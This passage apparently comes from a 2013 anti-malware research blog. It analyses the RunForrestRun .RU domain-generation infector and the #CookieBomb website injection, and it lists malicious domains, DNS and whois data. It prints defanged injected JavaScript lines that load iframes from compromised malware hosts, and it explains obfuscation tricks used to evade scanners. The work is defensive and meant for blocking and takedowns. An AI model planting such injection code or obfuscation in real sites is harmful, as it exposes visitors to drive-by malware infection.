talozzum.ru,31.133.52.8,
yrupxyen.ru,91.224.168.65,
nacwoman.ru,178.150.90.223,
libcikak.ru,46.119.128.115,
uphinjaq.ru,109.162.9.212,
aziwolge.ru,178.150.17.118,
oktizsez.ru,78.139.153.169,
kiyvryhy.ru,79.133.254.238,
fugegwyf.ru,188.190.75.232,
urxibzep.ru,91.225.173.12,
cibowjuv.ru,, // down
pedtokid.ru,, // down
bawoxgud.ru,31.133.55.240,
xudsahbu.ru,195.24.155.245,
dypqysro.ru,31.170.137.75,
jyuhysdo.ru,78.154.168.74,
hupjiwuc.ru,188.121.198.247,
cypseguv.ru,176.8.249.131,
confikja.ru,93.171.77.37,
tofhermi.ru,36.224.71.20,
ybtoptag.ru,180.61.12.116,
qeisybyg.ru,77.122.124.210,
mihumcuf.ru,93.185.220.213,
pywudcoz.ru,89.201.116.227,
kosnutef.ru,79.164.250.218,
acaqizwy.ru,178.150.244.54,
lymimnib.ru,117.197.15.103,
sisvizub.ru,89.28.52.30,
ankoweco.ru,, // down
uxmadjox.ru,, // down
hozfezbe.ru,178.210.222.205,

Again, we thank you to all friends, entities and support for your great cooperation and advise. Analysis and spotting a threat is one thing, but the hardest part is to make the threat goes down, better yet to put the crime responsible individuals to pay what they deserved.

MalwareMustDie will continue every effort to dismantle malware from internet and providing every crime evidence found to the related authority. Your help and support on every investigationwill be very appreciated.

Public announcement by #MalwareMustDie, NPO., 2013. All rights reserved.
Anti CyberCrime Research Group - malwaremustdie.org

Tuesday, July 23, 2013

MMD-0003-2013 - First "comeback" of the .RU RunForrestRun's DGA with 365 domains infector (ALIVE!)

I came into infection site spotted in Japan network as per snapshot below:

Which is a site to guide and introduce works for the lady workers, and that site is having infection of the obfuscation code of the RunForrestRun a DGA .RU domain-base malware infection. We are having experiences with this DGA from the day one we started malwaremustdie, so if you search for RunforrestRun keyword in our blog you'll see many result like this -->>[Google Search Result].

By successfully shutdown and stopping those infection cases in the past, using the knowledge we gathered, as a reference to share we released a public guide line for handling DGA cases as per posted in our Google Code here-->>[GoogleCode]

After a while we didn't see the activity of these infector, until yesterday accidentally saw the same infector once more. We posted this findings and how to decode this in our twitter announcement here:

The obfuscation code

There are some changes in the infector we spotted now, practicaly the randomization logic is slightly improved, and double obfuscation used is using a "blackhole" style of encoding javascript. The obfuscation itself was encoded by two layer encoding stages, we saw soe similar encoding style of these in the infected sites which lead to Blackhole or Cool Exploit Kit, suggested a co-relation between those cases (i.e.: they purchased the encoding service). The decoding steps can be viewed in our pastebin here-->>[PASTEBIN]

If we see the front encoded method, the one we saw injected in hacked site, it has the below structure:

If you see the typical tag used for encoded part (red color), it was wrapped within the script tag (purple color) and the JavaScript's String.fromCharCode method was used for decoding the long obfuscation data between those tags.

Just run the above code in any JS simulator we'll get the real obfuscation code. The hexed code we paste in pastebin link (mentioned above) too. By feeding the obfuscation long data into the logic below:

document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? 
..it stores those data into document object to be decoded in the below generator:

Which (the red color) shows the deobfuscation logic and the purple color shows the "eval" method used to extract the decoded value.

Finally we came into the final deobfuscated result which is the core of the "RunForrestRun" infector domain randomization logic itself. In this version, the randomization code I separated into three parts, the seeds, calculation part, and formulation logic, as per below breakdown:

And the result will be written as IFRAME in of the .RU urls of:

"h00p://" + domainName + ".RU/runforestrun?sid=botnet2"
As per below code states:

The infector domain and current status

Our friend, Mr. Darrel Rendell helped to extract the .RU infector domains based on time input to the random logic as per he tweeted below:

The result is very good seperated by the function of dates within a year of cycle of the extracted 365 domains, which can be viewed here-->>[PASTEBIN] < With thank you for the help on this.

I just checked the current ALIVE of the extracted domains using our beloved tool which we share it here-->>[GoogleCode] and found the current domains ARE UP & ALIVE as per below list:

bumggasfaoywfncc.ru,195.22.26.231,
vvteeuevhpbpepfi.ru,91.233.244.102,
ijxsncuprepwqzlt.ru,91.233.244.102,
knuidyekzkyuhtpi.ru,91.233.244.102,
You can see the check PoC that I performed in our paste here-->>[MMD Pastebin]
The other way to check whether these domains alive or not is via root DNS it self, I pick the first domain and search/trace it records in DNS now and found it alive:
Tracing to bumggasfaoywfncc.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
 |\___ a.dns.ripn.net [ru] (193.232.128.6)
 |     |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) Got authoritative answer
 |      \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) Got authoritative answer
 |\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
 |\___ b.dns.ripn.net [ru] (194.85.252.62)
 |     |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
 |      \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
 |\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
 |\___ d.dns.ripn.net [ru] (194.190.124.17)
 |     |\___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
 |      \___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
 |\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
 |\___ e.dns.ripn.net [ru] (193.232.142.17)
 |     |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
 |      \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
 |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
  \___ f.dns.ripn.net [ru] (193.232.156.17)
       |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
        \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
The below is the current URLQuery report of the four alive .RU infector URLs/domains above to check the HTTP response, the thank's to URLQuery for its "on-the-record" feature:
http://urlquery.net/report.php?id=3952242
http://urlquery.net/report.php?id=3952365
http://urlquery.net/report.php?id=3952414
http://urlquery.net/report.php?id=3952290
The 3 domains above replied with the IP of 91.233.244.102 is currently an active domains which can be proved by the whois data below:
domain:        VVTEEUEVHPBPEPFI.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.04.15
paid-till:     2014.04.15
free-date:     2014.05.16
source:        TCI
Last updated on 2013.07.24 01:36:36 MSK

domain:        IJXSNCUPREPWQZLT.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.04.15
paid-till:     2014.04.15
free-date:     2014.05.16
source:        TCI
Last updated on 2013.07.24 01:36:36 MSK

domain:        KNUIDYEKZKYUHTPI.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2012.11.06
paid-till:     2013.11.06
free-date:     2013.12.07
source:        TCI
Last updated on 2013.07.24 01:36:36 MSK
As per seen in the above data, the REGGI.RU registrar was tricked/abused somehow to let these domains entering internet. Later on we know that one domain left was sinkholed in 195.22.26.231.
We also learned that the abuse type of registration in Russia registrar always show the status of REGISTERED, DELEGATED, UNVERIFIED just as per stated in the above active domains. This information is very important to follow the shutdown process further.

The conclusion

This DGA is ALIVE and harmful. Please block these domains for it is proven ALIVE.
The usage of these DGA will not be good, so no further verdict needed from our side.
Our friend Conrad Longmore, from Dynamoo Blog also suggest all of us to block IP: 91.233.244.102 as per recorded many malicious activities found in this IP, as per following his tweet:

For the conveniences of the dismantling purpose we pasted also the list of domains we decoded from this DGA below, sorry for taking so much space for this report:
kxfcnwlyyohascji.ru
wjikjkybqouienfm.ru
jwkynwfxjqdqqmji.ru
vjnhblgryauqcpmr.ru
iwoughjskqxnoury.ru
tirdttcivfplnrds.ru
gwtrhozqbvudulyl.ru
siwafwlsbplqrxly.ru
fvxordgblagqooqx.ru
rhbyvkanoqokqyit.ru
evdmudjenjokhgmz.ru
phgunkwwcglepbdc.ru
cuijmuljysivscwe.ru
oglrzlxpvxfhgihb.ru
bumggasfaoywfncc.ru
ngpormkfmmcfgysb.ru
yrqwbnjqbnfhpbuu.ru
lguktmilemdssbyx.ru
xrvstpmjbtxnttxd.ru
kfzhvfgdfixkfdrr.ru
wqbrmmqhlkusiixa.ru
jfegifyhkbjxfflc.ru
uqfnewvxvyvsrxuk.ru
hejcagnpfrpnqefc.ru
tqkkpnnamkpqnyym.ru
genyzeyokjwxykzm.ru
spphczekzysdypqb.ru
fdsvrfljfaskbylv.ru
qptetotipsmswbqw.ru
ddxrlumbiwovldwg.ru
poyalyqorovwqves.ru
ntppvruxnkdjhvbh.ru
zgsxmhffvnizvxft.ru
mtuloilstrcfoykq.ru
yfxueilamhutmmnr.ru
ksyiaulnbpgnxpjs.ru
wfcsvebxgiynxlbc.ru
jsehchxfgboukksb.ru
vehpowijritygngg.ru
isjdecxytkoiazad.ru
uemmazcuvorvsadb.ru
grnzukxvhqnjfana.ru
sdqirxitzjgxxxhf.ru
frswwkcwyjwmrorb.ru
rdvfkzvdqxpufsep.ru
eqxsyluecdcxpped.ru
qdbewgrvhvwygvlo.ru
cqcrrdgweomwshmp.ru
ocfaopqtguzswofi.ru
bpholidutrkjmtpp.ru
nckwyplkpfqczmxl.ru
znlfqprdgejpllxi.ru
mbosgirfmfoygmhk.ru
xnqbiapjqcpvvcqz.ru
kbtpctegrcuillhc.ru
wmuxxiagzhcieofr.ru
jaymuwnpcjtqcwot.ru
vmzukuabemehxwpw.ru
hzbkqtgarqrmdlcx.ru
qqafbwfwjrflbmdo.ru
deeskswjfulkurjc.ru
ppfbslcowvdivwmr.ru
cejpdwxlftekbrch.ru
npkxjvsffuotzmij.ru
adnmvxwbyzjwvasg.ru
moouumrwtvnetzfu.ru
ybrdscaecknwugpu.ru
lotqnwonxpgigjox.ru
xawyilvvdurtcltc.ru
joynyhkerylsfygl.ru
vzzvoqbscqsnmrqr.ru
indlredwgvungvsq.ru
uyethhnsehcfqilz.ru
hniitysuwprckvzs.ru
syjqyvrpyohlexgj.ru
fmmflppopijsipdr.ru
ryonlorhvoekruec.ru
emrbflbunrcqrjgk.ru
qxsjdyodxeyyechp.ru
dlwxvurpfeyqyqcj.ru
oxxguneutbrhtsjx.ru
blbwpvcyztrepfue.ru
nwcenehdgqyxtssq.ru
zjfndnhwdsrwephi.ru
mwhbjgismatmjuji.ru
yikkpeqinkedjnxs.ru
kvmxjgblbhjgpjvw.ru
wipgnmjxfgwttrlf.ru
jvqtbrrbikxribjl.ru
vhtdynyciknmkblg.ru
tmlrjxvvrvkyxofn.ru
gbogvuamqydsxcgz.ru
smpovxvnxkelrgzt.ru
eatdfntzfgqrprmj.ru
qlulnseexvzpptcm.ru
dzvyrlqebdcolbei.ru
plzhfkuhkocvqwvx.ru
cybxcikisigkmqtl.ru
olegrpgtdxosnnkc.ru
aygtmclwegxsmjid.ru
mkjdkbwuxcnuxtqd.ru
yvklttrmfvygrvwk.ru
lknyzylpjzkasnmo.ru
xvphlknpxewklsyd.ru
kjsvlbwoxhcbtfpq.ru
vvteeuevhpbpepfi.ru
ijxsncuprepwqzlt.ru
uuyavjatmoykgodf.ru
hicqgipogsjulrgn.ru
tudygcklurkthcmt.ru
gihnijebfitftukm.ru
rtivxqoindugifaf.ru
ehmjatkmhnivwxdo.ru
qtnrpbmfuierqstw.ru
dhqgdpbdxrusdxcw.ru
psroiljvwkqrnfqf.ru
bhvdnklorkjcfppd.ru
nswltcjxwwnbrljp.ru
agabgtdhgsbspwsq.ru
mrcjwchanjuilitl.ru
yefscrehgfveysyc.ru
wjvftsujnszcvevs.ru
jwwtixcvymcflhob.ru
vibeglyuxuzbkgbo.ru
hwcrlxhvrevsnzwl.ru
tifbsmujkhbvbkyj.ru
gvhodonxvblrghch.ru
shkwimusoizncvhx.ru
fvllwtyeleporhen.ru
rhotamrrectjqfto.ru
duqhgptpqmsyyrqj.ru
phtqmnbhcmyknyss.ru
cuveztrnrgnshbgp.ru
ogymeohrjxfscgfs.ru
btacsqzlgctcxjei.ru
mgdlwkvcgkygcqck.ru
yretgeoqsvdnikar.ru
lfihodgqdjmfqppt.ru
xrjpymuxzutqaudg.ru
kfnebggkwsjlxzbk.ru
wqomqwbvtwiwejid.ru
ierbdycqkclubnex.ru
uqsiihfbyeotruuc.ru
hewwcxblormskqae.ru
tpxfuxwvnqcmekoi.ru
gdbvudwhpnuwrdls.ru
spdenojggmdrlixc.ru
edgsojssutkqjbxg.ru
qohaffgzdpnksohx.ru
ddloyfnurjprfwnb.ru
pomwopzpscwqxpfv.ru
zfguwvhdmjlutvwo.ru
mtiidqbknpskzasp.ru
xflrjyyjswoatsoq.ru
ksmfflbpefxgfdsv.ru
wepnhoeeodiklyar.ru
jsrcwahdmdarwmto.ru
veukmrlhkghlqqjn.ru
irwxwuybkwltqnhx.ru
tezhfswbxfnnuhbd.ru
grbwyglkgkieiybk.ru
sdefwonjqnujdoxr.ru
fqgtjwvcrkmuhkco.ru
rdjcjrxljzaughvt.ru
eqkplxtjjuhkbeqs.ru
pcoyyxsfhsyysfme.ru
cppmejjneikodxrc.ru
ocsuqiqvvknfvcjp.ru
bpujwsmplvftnqcx.ru
nbxrjalwllvnbmfs.ru
znyzszkdrxgnovuq.ru
lbcpvpxigyferhws.ru
xmexlajhysktwdqe.ru
kahmnunornwrgpgb.ru
wmiudbgrcvapriql.ru
jzkitejvrxgkgpgi.ru
ulnrpbudycxzdlkt.ru
hyoflopkupjioiqq.ru
tlrnhskrgijhwtlj.ru
gytcnulxsxpsqkfn.ru
skwkybckmywhrhbb.ru
dernflilrdxmfnye.ru
ppsvcvrcgkllplyn.ru
bdvkpbuldslsapeb.ru
npxsiiwpxqqiihmo.ru
adbjjkquyyhyqknf.ru
mocrafrewsdjztbj.ru
yafzvancybuwmnno.ru
lohnrnnpvvtxedfl.ru
wakvnkyzkyietkdr.ru
jnlkttkruqsdjqlx.ru
vznrahwzgntmfcqk.ru
inqgvoeohpcsfxmn.ru
uyrorwlibbjeasoq.ru
gmvdnpqbblixlgxj.ru
sywleisrsstsqoic.ru
fmacqvmqafqwmebl.ru
rxbkqfydlnzopqrn.ru
elfxqghdubihhsgd.ru
qxggipnnfmnihkic.ru
clkujrjqvexvbmoi.ru
owldagkyzrkhqnjo.ru
blorcdyiipxcwyxv.ru
nwpykqeizraqthry.ru
zisiiogqigzzqqeq.ru
mvuvchtcxxibeubd.ru
xixftoplsduqqorx.ru
kvzstpqmeoxtcwko.ru
whddmvrxufbkkoew.ru
jveqgnmjxkocqifr.ru
vhhzcvbegxbjsxke.ru
iujniiokeyjbmerc.ru
gacdiuwnhonuulpe.ru
rmdlgyreitjsjkfq.ru
ezfydrexncoidbus.ru
qlihxnncwioxkdls.ru
dyjvewshptsboygd.ru
plmekaayiholtevt.ru
cyosongjihugkjbg.ru
nkrbvqxzfwicmhwb.ru
axtopsbtntqnfdyk.ru
mkwwclogcvgeekws.ru
yvxfekhokspfuwqr.ru
ljbvfrsvcevyfhor.ru
xvcewyydwsmdgaju.ru
jjgshrjdcynohyuk.ru
vuhaojpwxgsxuitu.ru
iiloishkjwvqldlq.ru
uumwyzhctrwdsrdp.ru
hiplksflttfkpsxn.ru
ttqtkmthptxvwiku.ru
fhuidtlqttqxgjvn.ru
rtvqcdpbqxgwnrcn.ru
ehyewyqydfpidbdp.ru
qsbourrdxgxgwepy.ru
dhedppigtpbwrmpc.ru
osflhkaowydftniw.ru
bgjzhlasdrwwnenj.ru
nrkhysgoltauclop.ru
zenquqdskekaudbe.ru
mroeqjdaukskbgua.ru
ydrngsmrdiiyvoiy.ru
krtbityuhlewigfe.ru
jwkpdxqbemsmclal.ru
uinyjmxfqinkxbda.ru
hvpmffxpfnlquqxo.ru
tisubmfvqrgnloxr.ru
gvujhzvjxwptrtdg.ru
shxrsvasoncjnxpn.ru
fuyfrockpfclxccd.ru
qhcplcuugevvyham.ru
dueebwwdllfburag.ru
pghnrmkoeoetfwsm.ru
ctjbmgjudwisgshv.ru
ogmjjmqdhlbyabzg.ru
atnwerhvttvbivra.ru
mfqfrnqllqcrayiw.ru
yrrnrgliojezjctg.ru
lfvcngdbzjrzgyby.ru
xqwkdyjydkggsppd.ru
keabgwmpzqhpmlng.ru
vqcicnuhtwhxmtjd.ru
iefwvulgninlkoxe.ru
upgghggmbusopaxv.ru
hektxucstnbuncix.ru
tplczomvebjmhsgk.ru
gdoqznfilmtulxxv.ru
ropypfmcqjjfdiel.ru
edtmjcvfnfcbweed.ru
qouubrmdxtgnnjvm.ru
dcyjurmfwhgvyoio.ru
pozrtgdmhvhvdscn.ru
ccdifvomwhtynpay.ru
nneplwlvlcojiegm.ru
lsvdxjpwykxxvryd.ru
xfymtpavzblzbknq.ru
ksacasnubklrikdl.ru
wedkgpdcxlrunbmu.ru
jrfyaswntteouafv.ru
veihxoqukuetxqbn.ru
hrkusbnevtmyisab.ru
tdndpphrtyniynvz.ru
gqortbbbsnksxpmm.ru
sdrzgpowhyckaogu.ru
fqtooihtbhwdxskt.ru
rcwwrqssqrrfpgvd.ru
dpxkgybdgttbeyfh.ru
pcbukgjlihpvehyu.ru
cpdjalvpsvfgqtbd.ru
obgrcxuqunmquthx.ru
bpifbqdpzavdjljq.ru
nbloiroucuvotnck.ru
ymmwxgaimxgqtrdv.ru
lapkpatjbkubfxeu.ru
xmqspbcjfttkibbg.ru
kauhrjmdqenmtyvk.ru
wlvpilfxnxpdoujt.ru
jzxdofqtnlusever.ru
ulbnairmbptfscka.ru
hyccqffkdslpbuue.ru
tkfksqvkqdhspdsm.ru
gyhxgveinbdufdnt.ru
skkhxjykeyukyebl.ru
exmubcrfgpaijgzx.ru
opgsgmrejtyazcrf.ru
bdjhtgqhggicwrmy.ru
nolpsdqvivphcoew.ru
zboxoswkbebgarsh.ru
moplknnccyfkesaj.ru
yasuaexybixmvnge.ru
knuidyekzkyuhtpi.ru
wzvqmhzpppziurdl.ru
jnyfopdfycjyfomx.ru
vybofxkqmidtcnhq.ru
imedqfzemirxjqhn.ru
tyflwmgobjignmbd.ru
gmjzqviddrqumknm.ru
sxkiifqgzmsjvxzn.ru
fmnvbcuebuoyhxgq.ru
rxoebpmmwjgsphyp.ru
elsskgujckxkdqry.ru
pwtbsyitleslzngt.ru
clxpvwfqexkciciu.ru
owyxdqwgvlyndmwr.ru
bkcnxdtvxcjpyobq.ru
nwdvufzkpszkvxxk.ru
zigfmudoxbqehljf.ru
lvishxhsbgoyclva.ru
xhlbffbmicnnxpsk.ru
kvnoygvsciiyrnlp.ru
whqxutzyuwvaijbq.ru
jurlbjnqmycnjoat.ru
vhutmessbhrhonso.ru
huwiddttqzujegjk.ru
tgzqyfhfekefmnuv.ru
rlqglzqqhehmtryd.ru
eystwwslgmwxzqsu.ru
qlvcdbyuturxcusx.ru
dywqzqyouieuojub.ru
pkabphfegwhtnoug.ru
bycojtqkhamhawoj.ru
nkfxfqvofqbuhuuz.ru
axhlltpcxcixsdhv.ru
mjktxpzccvifevpc.ru
yvlcjbweeheoixyj.ru
ljoqjstmgdotqyll.ru
wupyyjwqhozwdpcb.ru
jitnlsxlmbtdzmwf.ru
vuuurusnjxorennj.ru
iiyjdtxigdyuyzcz.ru
utzrdmsexiffrltv.ru
hidifzbettjuadfh.ru
steqvhuhrqsmynoh.ru
fhifzexvhegcjtdx.ru
rsjmnrjedkuvhwfs.ru
ehmbrpusljbmykrn.ru
qsojzcltslhstxnj.ru
dgrxbomayxjhdike.ru
ossgrsfecodjxjhy.ru
bgwutpbwpbcrzthd.ru
nrxcdfhydmlcnoay.ru
zdbnzonswqhjphqh.ru
mrcblkrgikgxxtwc.ru
xdfjryydcfwvkvui.ru
kqhxgmvevducviey.ru

#MalwareMustDie!

What is behind #CookieBomb attack? (by @malm0u53)

You know me as @malm0u53 crusade member of MalwareMustDie. I would write about what #CookieBomb code injection's attack can actually damage and infect our system with this investigation report.

I saw a wide spread infection of code injection reported in here, and decided to help the investigation:

As you may see in my tweets, I was struggling with the recent infection reported. And I came into conclusion of what to grep to follow and mitigate this attack further: Which ending up to the list of the functions and its IFRAME redirection below:
" function zzzfff() { mdi.src = 'hxxp://kirtec.de/asvz/Mgf4RNhq.php';
" function zzzfff() { ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
" function zzzfff() { e.src =   'hxxp://onewaypr.my-ehost.com/products/YFb48ymx.php';
" function zzzfff() { y.src =   'hxxp://yogyavilla.com/Map_Chinese_files/dtd.php';
" function zzzfff() { ywbc.src ='hxxp://htm.co.za/js/clicker.php';
" function zzzfff() { kaizc.src ='hxxp://press2.blogolize.com/cnt.php';
" function zzzfff() { yk.src = 'hxxp://gidropark.net/traf.php';
" function zzzfff() { rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
" function zzzfff() { e.src = 'hxxp://www.viagemanimais.com.br/2R83bpTL.php';
" function zzzfff() { gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
" function zzzfff() { gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
" function zzzfff() { c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';"
" function zzzfff() { csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
" function zzzfff() { nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
" function zzzfff() { ax.src = 'hxxp://portofmiamicruiseparking.com/log/dtd.php';
" function zzzfff() { orih.src = 'hxxp://smartsecurit.cz/clik.php';
" function zzzfff() { i.src = 'hxxp://hauser-consulting.com/relay.php';
" function zzzfff() { pndb.src = 'hxxp://rocklandaerospace.com/edi/x46kpMKR.php';
" function zzzfff() { iwuu.src = 'hxxp://www.mai-ban.com/clik.php';
" function zzzfff() { p.src = 'hxxp://koliba.xercom.cz/yjW7x3V8.php';
" function zzzfff() { chyo.src = 'hxxp://dv-suedpfalz.de/melde/dtd.php';
" function zzzfff() { iin.src = 'hxxp://casino.kuti-komi.com/traf.php';
" function zzzfff() { di.src = 'hxxp://web134.sv01.net-housting.de/dtd.php';
" function zzzfff() { gir.src = 'hxxp://www.teutorace2012.de/components/mjBr9dbV.php';
" function zzzfff() { obgn.src = 'hxxp://www.talkingtojesus.com/Backups/QLMyqwF9.php';
" function zzzfff() { qvhb.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { s.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { ucr.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { vpbo.src = 'hxxp://inntech.org.ru/counter.php'
" function showkod(){ js_kod.src = 'hxxp://airbrush-design.cz/images/nGMcmjkK.php';
[...]

Wow. Many links to follow.. So I made breakdown check for each PHP infectors as per released in pastebin: http://pastebin.com/raw.php?i=0cGUGk8X

The significant results I summarized below:

One of the link of:

" function zzzfff() {
ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
redirect  >> hxxp://kastenbafortschrittliche.jaimestexmex.com:801/untrue-doing-edge_ago.htm
Which goes straight to the exploit page landing page I mentioned here

The other link goes straight to the fake 502:

function zzzfff() {
rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
"  >> 500 Internal Server Error
// header..
HTTP/1.1 500 Internal Server Error
Date: Mon, 22 Jul 2013 18:05:49 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 
        mod_auth_passthrough/2.1 mod_bwlimited/1.4 
FrontPage/5.0.2.2635
Content-Length: 704
Connection: close
Content-Type: text/html; charset=iso-8859-1
Verdict of the malicious URL above is here

One of the link redirecting to the localhost, strange for a good link is it?

" function zzzfff() {
     gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
  HTTP/1.1 302 Found

Date: Mon, 22 Jul 2013 18:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm3
Location: http://localhost/
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

One link lead to permanent redirection of Exploit Kit landing page, that IP is a Plesk panel user:

" function zzzfff() {
     gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
"  HTTP/1.1 301 Moved Permanently

Date: Mon, 22 Jul 2013 18:16:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.intrologic.nl/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: hxxp://www.intrologic.nl/Mn84DfXb.php
X-Powered-By: PleskLin
↑Verdict: [1] and [2]

One link of:

" function zzzfff() {
 c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';" >
Redirects users to:  hxxp://www.schwarzeraben.de/rel.php
Loads malware from:
fgnfdfthrv.bee.pl
alolipololi.osa.pl 
gberbhjerfds.osa.pl
zxsoftpromo.ru
centralfederation.ru
chimeboom.ru
faqaboutme.ru
lkjoiban.ru
longqwality.ru
zxsoftpromo.ru
↑This attack uses the .htaccess file to redirect users to a sites serving malware. Verdict: [1] http://labs.sucuri.net/db/malware/malware-entry-mwhta7 [3]
The MMD tools for domains check shows result of:
fgnfdfthrv.bee.pl,127.0.0.1,
alolipololi.osa.pl,74.125.236.80,
gberbhjerfds.osa.pl,127.0.0.1,
zxsoftpromo.ru,,
centralfederation.ru,,
chimeboom.ru,,
faqaboutme.ru,,
lkjoiban.ru,,
longqwality.ru,,
zxsoftpromo.ru,,
which means (WARNING!) the alolipololi.osa.pl domain is currently active for infection,
the fgnfdfthrv.bee.pl and gberbhjerfds.osa.pl is currently blacklisted and other .RU domains is inactive.

The below links went straight to the blacklisted sites:

" function zzzfff() {
csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 18:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html
↑Verdict: [1] [2]

And..

" function zzzfff() {
     nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
"
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 19:03:40 GMT
Server: Apache/1.3.41 (Unix) FrontPage/5.0.2.2635 PHP/5.2.17 mod_ssl/2.8.31 OpenSSL/0.9.8j
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Verdict: [1] [2]

With many other similar results in the pastebin I reported here

This investigation is posted to help to verdict the malicious activities caused by #CiookieBomb code injection attack and the shutdown purpose for its detected malicious domains. The post is a work of the group effort, thank you to: @DarrelRendell and @Secluded_Memory for the help supporting this case with great advice.

#MalwareMustDie!

Sunday, July 21, 2013

Some encoding note(s) on modified #CookieBomb attack's obfuscated injection code

We posted the attack related to this injection code in many web pages as per posted here: -->>[previous post], I called this as #CookieBomb attack, it uses the obfuscation JavaScript to burp the hidden redirection via IFRAME and the cookie condition to be used as a ticket for malware infection further maliciousre direction. This post is an additional note of a recent updates of injection code used, as a notice for the adjustment that needed to make for the automation tools on detection related infected sites (if necessary).

Recently I saw a slight modifications for the injected script for infection they use, which I tried to documented in here as per following points.

1. Method of PHP script wrapping

With a simple trick which using PHP script's "echo" command to obfuscate the JavaScript codes wrapped within.

I saw a new infected site with this code like this one, just now, well is is a good gardening shop site, a victim website:

If you see in the infected/hacked site it shows the code" " in the upper left corner of the page, thus in the HTML code you can see the malicious code injected to it. The injected code is having the same pattern of usage of a long long white spaces as a silly attempt o hide it.

The problem is, if you scan as per it is through "known" tools the scanning can not be performed as per it is, i.e.: you'll get the result like this-->>[LINK-1] or this-->>[LINK-2]
which is not showing any malicious detection (except the long white space trails maybe..) Yes this code "currently" can not be scanned in the JavaScript auto decoding tools, and that's what the bad guys wanted it.

So let's take a look closer at the code:

The bad actors is using the JavaScript wrapped in the php command, in this case the echo command, which for the symbol it needs to use the escape character of backslash "\" for the quote sign. This is why the automation can not decode this well, because actually it is in a form of PHP script.

So what are we suppose to overcome this? All we have to do is to remove those characters (I marked those character in the green color) above and you can decode it at will in any JavaScript decoding tools to get the result of the #CookieBomb code as per below:

This scheme will be changed for sure, but don't worry nor afraid of it, because no matter what these bad actors made we shall crack it well. I am sorry for the "light" technicalities I wrote this time, but the impact of this matter is huge and infection is wide, I assume the awareness is necessary. With noted, not only #CookieBomb case, the similar trick can be performed to avoid automation and detection to other malicious obfuscation too.

Samples

I share my decoding note in case you don't want to make risk accessing the infected site I mentioned above in here-->>[SAMPLE].
The password is as usual.

2. Method of mixing hex number

I found the infected sites as per below snapshot:

In the above picture it looks like the usual #CookieBomb obfuscated code, which is not.
My fellow co-workers complaining me that they can not decode this using the automation, which I checked into the Wepawet amd Jsunpack to confirm it as per shown in below:

If you see the code closer you will see the code contains the new trick of obfuscation using the character stated in its hex values as per snipped below:

As you see there are hex of "0x62" and "0xa-02" used in the obfuscation code.

In the first part, you change the hex into its ASCII character and in the second part if you calculate the hex calculation, you can substitute the result directly to the code into:

And you can decode these without problem by your favourite decoder tools, which mine is the "ape" one :-)
The decoded result:

3. Method of string splitting & mixing hex code operation with integer

There is an infected sites which injected by #CookieBomb code as per below:

The code is as per below code and can not be processed in automation tools, the question is why?

